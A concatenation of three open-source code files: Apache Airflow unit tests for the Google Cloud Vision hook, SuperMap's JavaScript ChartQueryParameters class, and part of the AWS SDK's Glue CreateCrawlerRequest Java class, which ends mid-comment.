PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCT_ID_TEST_2
)
product = Product(name=explicit_p_name)
update_product_method = get_conn.return_value.update_product
update_product_method.return_value = product
# When
result = self.hook.update_product(
location=location,
product_id=product_id,
product=product,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
assert result == MessageToDict(product)
update_product_method.assert_called_once_with(
product=Product(name=explicit_p_name), metadata=None, retry=None, timeout=None, update_mask=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_product_explicit_name_different_from_constructed(self, get_conn):
# Given
update_product_method = get_conn.return_value.update_product
update_product_method.return_value = None
explicit_p_name = ProductSearchClient.product_path(
PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCT_ID_TEST_2
)
product = Product(name=explicit_p_name)
template_p_name = ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCT_ID_TEST)
# When
# Location and product_id are passed in addition to a Product with an explicit name,
# but both names differ (constructed != explicit).
# Should throw AirflowException in this case.
with pytest.raises(AirflowException) as ctx:
self.hook.update_product(
location=LOC_ID_TEST,
product_id=PRODUCT_ID_TEST,
product=product,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
err = ctx.value
assert err
assert (
ERR_DIFF_NAMES.format(
explicit_name=explicit_p_name,
constructed_name=template_p_name,
label="Product",
id_label="product_id",
)
in str(err)
)
update_product_method.assert_not_called()
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_delete_product(self, get_conn):
# Given
delete_product_method = get_conn.return_value.delete_product
delete_product_method.return_value = None
name = ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCT_ID_TEST)
# When
response = self.hook.delete_product(
location=LOC_ID_TEST, product_id=PRODUCT_ID_TEST, project_id=PROJECT_ID_TEST
)
# Then
assert response is None
delete_product_method.assert_called_once_with(name=name, retry=None, timeout=None, metadata=None)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_detect_text(self, annotator_client_mock):
# Given
detect_text_method = annotator_client_mock.text_detection
detect_text_method.return_value = AnnotateImageResponse(
text_annotations=[EntityAnnotation(description="test", score=0.5)]
)
# When
self.hook.text_detection(image=DETECT_TEST_IMAGE)
# Then
detect_text_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_detect_text_with_additional_properties(self, annotator_client_mock):
# Given
detect_text_method = annotator_client_mock.text_detection
detect_text_method.return_value = AnnotateImageResponse(
text_annotations=[EntityAnnotation(description="test", score=0.5)]
)
# When
self.hook.text_detection(
image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"}
)
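        # The additional_properties dict is expected to be flattened into keyword arguments of the client call.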
# Then
detect_text_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2"
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_detect_text_with_error_response(self, annotator_client_mock):
# Given
detect_text_method = annotator_client_mock.text_detection
detect_text_method.return_value = AnnotateImageResponse(
error={"code": 3, "message": "test error message"}
)
# When
with pytest.raises(AirflowException) as ctx:
self.hook.text_detection(image=DETECT_TEST_IMAGE)
err = ctx.value
assert "test error message" in str(err)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_document_text_detection(self, annotator_client_mock):
# Given
document_text_detection_method = annotator_client_mock.document_text_detection
document_text_detection_method.return_value = AnnotateImageResponse(
text_annotations=[EntityAnnotation(description="test", score=0.5)]
)
# When
self.hook.document_text_detection(image=DETECT_TEST_IMAGE)
# Then
document_text_detection_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_document_text_detection_with_additional_properties(self, annotator_client_mock):
# Given
document_text_detection_method = annotator_client_mock.document_text_detection
document_text_detection_method.return_value = AnnotateImageResponse(
text_annotations=[EntityAnnotation(description="test", score=0.5)]
)
# When
self.hook.document_text_detection(
image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"}
)
# Then
document_text_detection_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2"
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_detect_document_text_with_error_response(self, annotator_client_mock):
# Given
detect_text_method = annotator_client_mock.document_text_detection
detect_text_method.return_value = AnnotateImageResponse(
error={"code": 3, "message": "test error message"}
)
# When
with pytest.raises(AirflowException) as ctx:
self.hook.document_text_detection(image=DETECT_TEST_IMAGE)
err = ctx.value
assert "test error message" in str(err)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_label_detection(self, annotator_client_mock):
# Given
label_detection_method = annotator_client_mock.label_detection
label_detection_method.return_value = AnnotateImageResponse(
label_annotations=[EntityAnnotation(description="test", score=0.5)]
)
# When
self.hook.label_detection(image=DETECT_TEST_IMAGE)
# Then
label_detection_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_label_detection_with_additional_properties(self, annotator_client_mock):
# Given
label_detection_method = annotator_client_mock.label_detection
label_detection_method.return_value = AnnotateImageResponse(
label_annotations=[EntityAnnotation(description="test", score=0.5)]
)
# When
self.hook.label_detection(
image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"}
)
# Then
label_detection_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2"
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_label_detection_with_error_response(self, annotator_client_mock):
# Given
detect_text_method = annotator_client_mock.label_detection
detect_text_method.return_value = AnnotateImageResponse(
error={"code": 3, "message": "test error message"}
)
# When
with pytest.raises(AirflowException) as ctx:
self.hook.label_detection(image=DETECT_TEST_IMAGE)
err = ctx.value
assert "test error message" in str(err)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_safe_search_detection(self, annotator_client_mock):
# Given
safe_search_detection_method = annotator_client_mock.safe_search_detection
safe_search_detection_method.return_value = AnnotateImageResponse(
safe_search_annotation=SafeSearchAnnotation(
adult="VERY_UNLIKELY",
spoof="VERY_UNLIKELY",
medical="VERY_UNLIKELY",
violence="VERY_UNLIKELY",
racy="VERY_UNLIKELY",
)
)
# When
self.hook.safe_search_detection(image=DETECT_TEST_IMAGE)
# Then
safe_search_detection_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_safe_search_detection_with_additional_properties(self, annotator_client_mock):
# Given
safe_search_detection_method = annotator_client_mock.safe_search_detection
safe_search_detection_method.return_value = AnnotateImageResponse(
safe_search_annotation=SafeSearchAnnotation(
adult="VERY_UNLIKELY",
spoof="VERY_UNLIKELY",
medical="VERY_UNLIKELY",
violence="VERY_UNLIKELY",
racy="VERY_UNLIKELY",
)
)
# When
self.hook.safe_search_detection(
image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"}
)
# Then
safe_search_detection_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2"
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_safe_search_detection_with_error_response(self, annotator_client_mock):
# Given
detect_text_method = annotator_client_mock.safe_search_detection
detect_text_method.return_value = AnnotateImageResponse(
error={"code": 3, "message": "test error message"}
)
# When
with pytest.raises(AirflowException) as ctx:
self.hook.safe_search_detection(image=DETECT_TEST_IMAGE)
err = ctx.value
assert "test error message" in str(err)
| apache/incubator-airflow | tests/providers/google/cloud/hooks/test_vision.py | Python | apache-2.0 | 38,031 |
/* COPYRIGHT 2012 SUPERMAP
 * This program may only be used under a valid license.
 * Unauthorized use or distribution by any means is prohibited. */
/**
* @requires SuperMap/Util.js
* @requires SuperMap/REST.js
*/
/**
* Class: SuperMap.REST.ChartQueryParameters
 * Chart query parameter class. This class sets the parameters of a chart
 * query. Chart queries come in two kinds, chart attribute queries and chart
 * bounds queries; the query mode is specified via the queryMode property.
 * Required properties: queryMode, chartLayerNames, chartQueryFilterParameters.
 * For a chart bounds query, bounds is also required.
*/
SuperMap.REST.ChartQueryParameters = SuperMap.Class({
/**
* APIProperty: queryMode
     * {String} Chart query mode. SuperMap iClient for JavaScript supports
     * two chart query modes: chart attribute query ("ChartAttributeQuery")
     * and chart bounds query ("ChartBoundsQuery").
*/
queryMode:null,
/**
* APIProperty: bounds
     * {<SuperMap.Bounds>} The query bounds of the chart query.
*/
bounds:null,
/**
* APIProperty: chartLayerNames
     * {Array(String)} Names of the chart layers to query.
*/
chartLayerNames:null,
/**
* APIProperty: chartQueryFilterParameters
     * {Array <SuperMap.REST.ChartQueryFilterParameter>} Chart query filter
     * parameters, including the feature object code, the choice of applicable
     * object types (whether to query points, lines, or areas), and attribute
     * field filter conditions.
*/
chartQueryFilterParameters:null,
/**
* Property: returnContent
     * {Boolean} Whether to return the query result recordsets or the
     * resource information (resourceInfo) of the query result. Defaults to
     * true, meaning recordsets are returned.
     *
     * note: Both Recordsets and ResourceInfo are stored in the query result
     * class QueryResult. When
     * (start code)
     * ReturnContent = true
     * (end)
     * the query recordsets are returned: the result is stored in
     * (start code)
     * QueryResult.Recordsets
     * (end)
     * and
     * (start code)
     * QueryResult.ResourceInfo
     * (end)
     * is null; when
     * (start code)
     * ReturnContent = false
     * (end)
     * the query result resource is returned: the result is stored in
     * (start code)
     * QueryResult.ResourceInfo
     * (end)
     * and
     * (start code)
     * QueryResult.Recordsets
     * (end)
     * is null.
*/
returnContent:true,
/**
* APIProperty: startRecord
     * {Number} Start position of the query records. Defaults to 0.
*/
startRecord:0,
/**
* APIProperty: expectCount
     * {Number} Expected number of records returned by the query; the value must be greater than 0.
*/
expectCount:null,
/**
* Constructor: SuperMap.REST.ChartQueryParameters
     * Initializes a new instance of the ChartQueryParameters class.
     *
     * Parameters:
     * options - {Object} Parameters.
     *
     * Allowed options properties:
     * queryMode - {String} Chart query mode. SuperMap iClient for JavaScript
     *     supports two chart query modes: chart attribute query
     *     ("ChartAttributeQuery") and chart bounds query ("ChartBoundsQuery").
     * bounds - {<SuperMap.Bounds>} The query bounds of the chart query.
     * chartLayerNames - {Array(String)} Names of the chart layers to query.
     * chartQueryFilterParameters - {Array <SuperMap.REST.ChartQueryFilterParameter>}
     *     Chart query filter parameters, including the feature object code,
     *     the choice of applicable object types (whether to query points,
     *     lines, or areas), and attribute field filter conditions.
     * returnContent - {Boolean} Whether to return the query result recordsets
     *     or the resourceInfo of the query result. Defaults to true, meaning
     *     recordsets are returned.
     * startRecord - {Number} Start position of the query records. Defaults to 0.
     * expectCount - {Number} Expected number of records returned by the query;
     *     the value must be greater than 0.
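     *
     * Example:
     * A minimal sketch of building the parameters (the layer name and the
     * filter variable are illustrative assumptions, not values from this file):
     * (start code)
     * var chartQueryParameters = new SuperMap.REST.ChartQueryParameters({
     *     queryMode: "ChartBoundsQuery",
     *     bounds: new SuperMap.Bounds(-180, -90, 180, 90),
     *     chartLayerNames: ["GB4X0000_52000"],
     *     chartQueryFilterParameters: [chartQueryFilterParameter]
     * });
     * (end)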
*/
initialize:function (options) {
if (!options) {
return;
}
SuperMap.Util.extend(this, options);
},
/**
* APIMethod: destroy
     * Releases the resources, setting the properties that reference them to null.
*/
destroy:function () {
var me = this;
me.queryMode = null;
me.bounds = null;
me.chartLayerNames = null;
me.chartQueryFilterParameters = null;
me.returnContent = true;
me.startRecord = 0;
me.expectCount = null;
},
/**
* Method: getVariablesJson
     * Converts the property information into a JSON string that the service can recognize.
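     *
     * For a bounds query the returned string looks roughly like the sketch
     * below (the layer name and counts are illustrative assumptions):
     * (start code)
     * {"queryMode":"ChartBoundsQuery","chartLayerNames":["GB4X0000_52000"],
     * "bounds":{"leftBottom":{"x":-180,"y":-90},"rightTop":{"x":180,"y":90}},
     * "chartQueryParameters":{"chartQueryParams":[],"startRecord":0,"expectCount":100}}
     * (end)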
*/
getVariablesJson:function () {
var json="";
json += "\"queryMode\":\"" + this.queryMode + "\",";
if (this.chartLayerNames && this.chartLayerNames.length) {
var chartLayersArray = [];
var layerLength = this.chartLayerNames.length;
for (var i = 0; i < layerLength; i++)
{
chartLayersArray.push("\""+this.chartLayerNames[i]+"\"");
}
var layerNames = "[" + chartLayersArray.join(",") + "]";
json += "\"chartLayerNames\":" + layerNames + ",";
}
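        // Bounds are serialized only for bounds queries ("ChartBoundsQuery"); attribute queries skip this block.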
if (this.queryMode === "ChartBoundsQuery" && this.bounds) {
json += "\"bounds\":" + "{" + "\"leftBottom\":" + "{" + "\"x\":" + this.bounds.left + "," +
"\"y\":" + this.bounds.bottom + "}" + "," + "\"rightTop\":" + "{" + "\"x\":" + this.bounds.right + "," +
"\"y\":" + this.bounds.top + "}" + "},";
}
if (this.chartQueryFilterParameters && this.chartQueryFilterParameters.length) {
var chartParamArray = [];
var chartLength = this.chartQueryFilterParameters.length;
for (var j = 0; j < chartLength; j++)
{
                var chartQueryFilterParameter = this.chartQueryFilterParameters[j];
chartParamArray.push(chartQueryFilterParameter.toJson());
}
var chartParamsJson = "[" + chartParamArray.join(",") + "]";
chartParamsJson = "\"chartQueryParams\":" + chartParamsJson + ",";
chartParamsJson += "\"startRecord\":" + this.startRecord + ",";
chartParamsJson += "\"expectCount\":" + this.expectCount;
chartParamsJson = "{" + chartParamsJson + "}";
json += "\"chartQueryParameters\":" + chartParamsJson;
}
json = "{" + json + "}";
return json;
},
CLASS_NAME:"SuperMap.REST.ChartQueryParameters"
}) | SuperMap/iClient-for-JavaScript | libs/SuperMap/REST/Query/ChartQueryParameters.js | JavaScript | apache-2.0 | 6,706 |
/*
* Copyright 2017-2022 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
* the License. A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
* CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
* and limitations under the License.
*/
package com.amazonaws.services.glue.model;
import java.io.Serializable;
import javax.annotation.Generated;
import com.amazonaws.AmazonWebServiceRequest;
/**
*
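 * <p>
 * A minimal usage sketch (the crawler name, role ARN, database, and empty targets below are
 * illustrative assumptions, not values taken from this class):
 * </p>
 *
 * <pre>
 * CreateCrawlerRequest request = new CreateCrawlerRequest()
 *         .withName("my-crawler")
 *         .withRole("arn:aws:iam::123456789012:role/MyGlueCrawlerRole")
 *         .withDatabaseName("my_database")
 *         .withTargets(new CrawlerTargets());
 * </pre>
 *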
* @see <a href="http://docs.aws.amazon.com/goto/WebAPI/glue-2017-03-31/CreateCrawler" target="_top">AWS API
* Documentation</a>
*/
@Generated("com.amazonaws:aws-java-sdk-code-generator")
public class CreateCrawlerRequest extends com.amazonaws.AmazonWebServiceRequest implements Serializable, Cloneable {
/**
* <p>
* Name of the new crawler.
* </p>
*/
private String name;
/**
* <p>
* The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer resources.
* </p>
*/
private String role;
/**
* <p>
* The Glue database where results are written, such as:
* <code>arn:aws:daylight:us-east-1::database/sometable/*</code>.
* </p>
*/
private String databaseName;
/**
* <p>
* A description of the new crawler.
* </p>
*/
private String description;
/**
* <p>
     * A list of collections of targets to crawl.
* </p>
*/
private CrawlerTargets targets;
/**
* <p>
* A <code>cron</code> expression used to specify the schedule (see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html">Time-Based Schedules for
     * Jobs and Crawlers</a>). For example, to run something every day at 12:15 UTC, you would specify:
* <code>cron(15 12 * * ? *)</code>.
* </p>
*/
private String schedule;
/**
* <p>
* A list of custom classifiers that the user has registered. By default, all built-in classifiers are included in a
* crawl, but these custom classifiers always override the default classifiers for a given classification.
* </p>
*/
private java.util.List<String> classifiers;
/**
* <p>
* The table prefix used for catalog tables that are created.
* </p>
*/
private String tablePrefix;
/**
* <p>
* The policy for the crawler's update and deletion behavior.
* </p>
*/
private SchemaChangePolicy schemaChangePolicy;
/**
* <p>
* A policy that specifies whether to crawl the entire dataset again, or to crawl only folders that were added since
* the last crawler run.
* </p>
*/
private RecrawlPolicy recrawlPolicy;
/**
* <p>
* Specifies data lineage configuration settings for the crawler.
* </p>
*/
private LineageConfiguration lineageConfiguration;
private LakeFormationConfiguration lakeFormationConfiguration;
/**
* <p>
* Crawler configuration information. This versioned JSON string allows users to specify aspects of a crawler's
* behavior. For more information, see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/crawler-configuration.html">Configuring a Crawler</a>.
* </p>
*/
private String configuration;
/**
* <p>
* The name of the <code>SecurityConfiguration</code> structure to be used by this crawler.
* </p>
*/
private String crawlerSecurityConfiguration;
/**
* <p>
* The tags to use with this crawler request. You may use tags to limit access to the crawler. For more information
* about tags in Glue, see <a href="https://docs.aws.amazon.com/glue/latest/dg/monitor-tags.html">Amazon Web
* Services Tags in Glue</a> in the developer guide.
* </p>
*/
private java.util.Map<String, String> tags;
/**
* <p>
* Name of the new crawler.
* </p>
*
* @param name
* Name of the new crawler.
*/
public void setName(String name) {
this.name = name;
}
/**
* <p>
* Name of the new crawler.
* </p>
*
* @return Name of the new crawler.
*/
public String getName() {
return this.name;
}
/**
* <p>
* Name of the new crawler.
* </p>
*
* @param name
* Name of the new crawler.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withName(String name) {
setName(name);
return this;
}
/**
* <p>
* The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer resources.
* </p>
*
* @param role
* The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer
* resources.
*/
public void setRole(String role) {
this.role = role;
}
/**
* <p>
* The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer resources.
* </p>
*
* @return The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer
* resources.
*/
public String getRole() {
return this.role;
}
/**
* <p>
* The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer resources.
* </p>
*
* @param role
* The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer
* resources.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withRole(String role) {
setRole(role);
return this;
}
/**
* <p>
* The Glue database where results are written, such as:
* <code>arn:aws:daylight:us-east-1::database/sometable/*</code>.
* </p>
*
* @param databaseName
* The Glue database where results are written, such as:
* <code>arn:aws:daylight:us-east-1::database/sometable/*</code>.
*/
public void setDatabaseName(String databaseName) {
this.databaseName = databaseName;
}
/**
* <p>
* The Glue database where results are written, such as:
* <code>arn:aws:daylight:us-east-1::database/sometable/*</code>.
* </p>
*
* @return The Glue database where results are written, such as:
* <code>arn:aws:daylight:us-east-1::database/sometable/*</code>.
*/
public String getDatabaseName() {
return this.databaseName;
}
/**
* <p>
* The Glue database where results are written, such as:
* <code>arn:aws:daylight:us-east-1::database/sometable/*</code>.
* </p>
*
* @param databaseName
* The Glue database where results are written, such as:
* <code>arn:aws:daylight:us-east-1::database/sometable/*</code>.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withDatabaseName(String databaseName) {
setDatabaseName(databaseName);
return this;
}
/**
* <p>
* A description of the new crawler.
* </p>
*
* @param description
* A description of the new crawler.
*/
public void setDescription(String description) {
this.description = description;
}
/**
* <p>
* A description of the new crawler.
* </p>
*
* @return A description of the new crawler.
*/
public String getDescription() {
return this.description;
}
/**
* <p>
* A description of the new crawler.
* </p>
*
* @param description
* A description of the new crawler.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withDescription(String description) {
setDescription(description);
return this;
}
/**
* <p>
     * A list of collections of targets to crawl.
* </p>
*
* @param targets
     *        A list of collections of targets to crawl.
*/
public void setTargets(CrawlerTargets targets) {
this.targets = targets;
}
/**
* <p>
     * A list of collections of targets to crawl.
* </p>
*
     * @return A list of collections of targets to crawl.
*/
public CrawlerTargets getTargets() {
return this.targets;
}
/**
* <p>
     * A list of collections of targets to crawl.
* </p>
*
* @param targets
     *        A list of collections of targets to crawl.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withTargets(CrawlerTargets targets) {
setTargets(targets);
return this;
}
/**
* <p>
* A <code>cron</code> expression used to specify the schedule (see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html">Time-Based Schedules for
     * Jobs and Crawlers</a>). For example, to run something every day at 12:15 UTC, you would specify:
* <code>cron(15 12 * * ? *)</code>.
* </p>
*
* @param schedule
* A <code>cron</code> expression used to specify the schedule (see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html">Time-Based
     *        Schedules for Jobs and Crawlers</a>). For example, to run something every day at 12:15 UTC, you would
* specify: <code>cron(15 12 * * ? *)</code>.
*/
public void setSchedule(String schedule) {
this.schedule = schedule;
}
/**
* <p>
* A <code>cron</code> expression used to specify the schedule (see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html">Time-Based Schedules for
     * Jobs and Crawlers</a>). For example, to run something every day at 12:15 UTC, you would specify:
* <code>cron(15 12 * * ? *)</code>.
* </p>
*
* @return A <code>cron</code> expression used to specify the schedule (see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html">Time-Based
     *         Schedules for Jobs and Crawlers</a>). For example, to run something every day at 12:15 UTC, you would
* specify: <code>cron(15 12 * * ? *)</code>.
*/
public String getSchedule() {
return this.schedule;
}
/**
* <p>
* A <code>cron</code> expression used to specify the schedule (see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html">Time-Based Schedules for
     * Jobs and Crawlers</a>). For example, to run something every day at 12:15 UTC, you would specify:
* <code>cron(15 12 * * ? *)</code>.
* </p>
*
* @param schedule
* A <code>cron</code> expression used to specify the schedule (see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html">Time-Based
     *        Schedules for Jobs and Crawlers</a>). For example, to run something every day at 12:15 UTC, you would
* specify: <code>cron(15 12 * * ? *)</code>.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withSchedule(String schedule) {
setSchedule(schedule);
return this;
}
/**
* <p>
* A list of custom classifiers that the user has registered. By default, all built-in classifiers are included in a
* crawl, but these custom classifiers always override the default classifiers for a given classification.
* </p>
*
* @return A list of custom classifiers that the user has registered. By default, all built-in classifiers are
* included in a crawl, but these custom classifiers always override the default classifiers for a given
* classification.
*/
public java.util.List<String> getClassifiers() {
return classifiers;
}
/**
* <p>
* A list of custom classifiers that the user has registered. By default, all built-in classifiers are included in a
* crawl, but these custom classifiers always override the default classifiers for a given classification.
* </p>
*
* @param classifiers
* A list of custom classifiers that the user has registered. By default, all built-in classifiers are
* included in a crawl, but these custom classifiers always override the default classifiers for a given
* classification.
*/
public void setClassifiers(java.util.Collection<String> classifiers) {
if (classifiers == null) {
this.classifiers = null;
return;
}
this.classifiers = new java.util.ArrayList<String>(classifiers);
}
/**
* <p>
* A list of custom classifiers that the user has registered. By default, all built-in classifiers are included in a
* crawl, but these custom classifiers always override the default classifiers for a given classification.
* </p>
* <p>
* <b>NOTE:</b> This method appends the values to the existing list (if any). Use
* {@link #setClassifiers(java.util.Collection)} or {@link #withClassifiers(java.util.Collection)} if you want to
* override the existing values.
* </p>
*
* @param classifiers
* A list of custom classifiers that the user has registered. By default, all built-in classifiers are
* included in a crawl, but these custom classifiers always override the default classifiers for a given
* classification.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withClassifiers(String... classifiers) {
if (this.classifiers == null) {
setClassifiers(new java.util.ArrayList<String>(classifiers.length));
}
for (String ele : classifiers) {
this.classifiers.add(ele);
}
return this;
}
/**
* <p>
* A list of custom classifiers that the user has registered. By default, all built-in classifiers are included in a
* crawl, but these custom classifiers always override the default classifiers for a given classification.
* </p>
*
* @param classifiers
* A list of custom classifiers that the user has registered. By default, all built-in classifiers are
* included in a crawl, but these custom classifiers always override the default classifiers for a given
* classification.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withClassifiers(java.util.Collection<String> classifiers) {
setClassifiers(classifiers);
return this;
}
/**
* <p>
* The table prefix used for catalog tables that are created.
* </p>
*
* @param tablePrefix
* The table prefix used for catalog tables that are created.
*/
public void setTablePrefix(String tablePrefix) {
this.tablePrefix = tablePrefix;
}
/**
* <p>
* The table prefix used for catalog tables that are created.
* </p>
*
* @return The table prefix used for catalog tables that are created.
*/
public String getTablePrefix() {
return this.tablePrefix;
}
/**
* <p>
* The table prefix used for catalog tables that are created.
* </p>
*
* @param tablePrefix
* The table prefix used for catalog tables that are created.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withTablePrefix(String tablePrefix) {
setTablePrefix(tablePrefix);
return this;
}
/**
* <p>
* The policy for the crawler's update and deletion behavior.
* </p>
*
* @param schemaChangePolicy
* The policy for the crawler's update and deletion behavior.
*/
public void setSchemaChangePolicy(SchemaChangePolicy schemaChangePolicy) {
this.schemaChangePolicy = schemaChangePolicy;
}
/**
* <p>
* The policy for the crawler's update and deletion behavior.
* </p>
*
* @return The policy for the crawler's update and deletion behavior.
*/
public SchemaChangePolicy getSchemaChangePolicy() {
return this.schemaChangePolicy;
}
/**
* <p>
* The policy for the crawler's update and deletion behavior.
* </p>
*
* @param schemaChangePolicy
* The policy for the crawler's update and deletion behavior.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withSchemaChangePolicy(SchemaChangePolicy schemaChangePolicy) {
setSchemaChangePolicy(schemaChangePolicy);
return this;
}
/**
* <p>
* A policy that specifies whether to crawl the entire dataset again, or to crawl only folders that were added since
* the last crawler run.
* </p>
*
* @param recrawlPolicy
* A policy that specifies whether to crawl the entire dataset again, or to crawl only folders that were
* added since the last crawler run.
*/
public void setRecrawlPolicy(RecrawlPolicy recrawlPolicy) {
this.recrawlPolicy = recrawlPolicy;
}
/**
* <p>
* A policy that specifies whether to crawl the entire dataset again, or to crawl only folders that were added since
* the last crawler run.
* </p>
*
* @return A policy that specifies whether to crawl the entire dataset again, or to crawl only folders that were
* added since the last crawler run.
*/
public RecrawlPolicy getRecrawlPolicy() {
return this.recrawlPolicy;
}
/**
* <p>
* A policy that specifies whether to crawl the entire dataset again, or to crawl only folders that were added since
* the last crawler run.
* </p>
*
* @param recrawlPolicy
* A policy that specifies whether to crawl the entire dataset again, or to crawl only folders that were
* added since the last crawler run.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withRecrawlPolicy(RecrawlPolicy recrawlPolicy) {
setRecrawlPolicy(recrawlPolicy);
return this;
}
/**
* <p>
* Specifies data lineage configuration settings for the crawler.
* </p>
*
* @param lineageConfiguration
* Specifies data lineage configuration settings for the crawler.
*/
public void setLineageConfiguration(LineageConfiguration lineageConfiguration) {
this.lineageConfiguration = lineageConfiguration;
}
/**
* <p>
* Specifies data lineage configuration settings for the crawler.
* </p>
*
* @return Specifies data lineage configuration settings for the crawler.
*/
public LineageConfiguration getLineageConfiguration() {
return this.lineageConfiguration;
}
/**
* <p>
* Specifies data lineage configuration settings for the crawler.
* </p>
*
* @param lineageConfiguration
* Specifies data lineage configuration settings for the crawler.
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withLineageConfiguration(LineageConfiguration lineageConfiguration) {
setLineageConfiguration(lineageConfiguration);
return this;
}
/**
* @param lakeFormationConfiguration
*/
public void setLakeFormationConfiguration(LakeFormationConfiguration lakeFormationConfiguration) {
this.lakeFormationConfiguration = lakeFormationConfiguration;
}
/**
* @return
*/
public LakeFormationConfiguration getLakeFormationConfiguration() {
return this.lakeFormationConfiguration;
}
/**
* @param lakeFormationConfiguration
* @return Returns a reference to this object so that method calls can be chained together.
*/
public CreateCrawlerRequest withLakeFormationConfiguration(LakeFormationConfiguration lakeFormationConfiguration) {
setLakeFormationConfiguration(lakeFormationConfiguration);
return this;
}
/**
* <p>
* Crawler configuration information. This versioned JSON string allows users to specify aspects of a crawler's
* behavior. For more information, see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/crawler-configuration.html">Configuring a Crawler</a>.
* </p>
*
* @param configuration
* Crawler configuration information. This versioned JSON string allows users to specify aspects of a
* crawler's behavior. For more information, see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/crawler-configuration.html">Configuring a Crawler</a>.
*/
public void setConfiguration(String configuration) {
this.configuration = configuration;
}
/**
* <p>
* Crawler configuration information. This versioned JSON string allows users to specify aspects of a crawler's
* behavior. For more information, see <a
* href="https://docs.aws.amazon.com/glue/latest/dg/crawler-configuration.html">Configuring a Crawler</a>.
* </p>
*
* @return Crawler configuration information. This versioned JSON string allows users to specify aspects of a
* crawler's behavior. For more information, see <a
